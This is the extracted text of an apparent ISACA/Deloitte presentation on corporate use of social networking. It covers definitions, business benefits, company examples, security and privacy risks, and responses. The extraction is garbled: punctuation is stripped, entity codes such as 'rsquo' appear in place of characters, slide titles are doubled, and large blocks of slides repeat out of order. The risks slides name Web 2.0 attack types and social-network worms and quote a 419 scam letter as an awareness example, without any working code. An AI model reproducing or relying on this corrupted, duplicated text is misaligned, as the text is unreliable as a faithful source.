Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg3
Definitions and terminologyDefinitions and terminology
wwwisacaorg4
Social network Social network mdashmdash Some definitionsSome definitions
bull As defined in Wikipediandash A social network is a social structure made
of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency such as values visions ideas financial exchange friendship kinship dislike conflict or trade The resulting structures are often very complex
bull As defined in Webmasterndash Social networking is a phenomena defined by linking people to each
other in some way Digg is a popular example of a social network (using social bookmarking) Users work together to rate news and are linked by rating choices or explicit identification of other members Generally social networks are used to allow or encourage various types of activity whether commercial social or some combination of the two
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
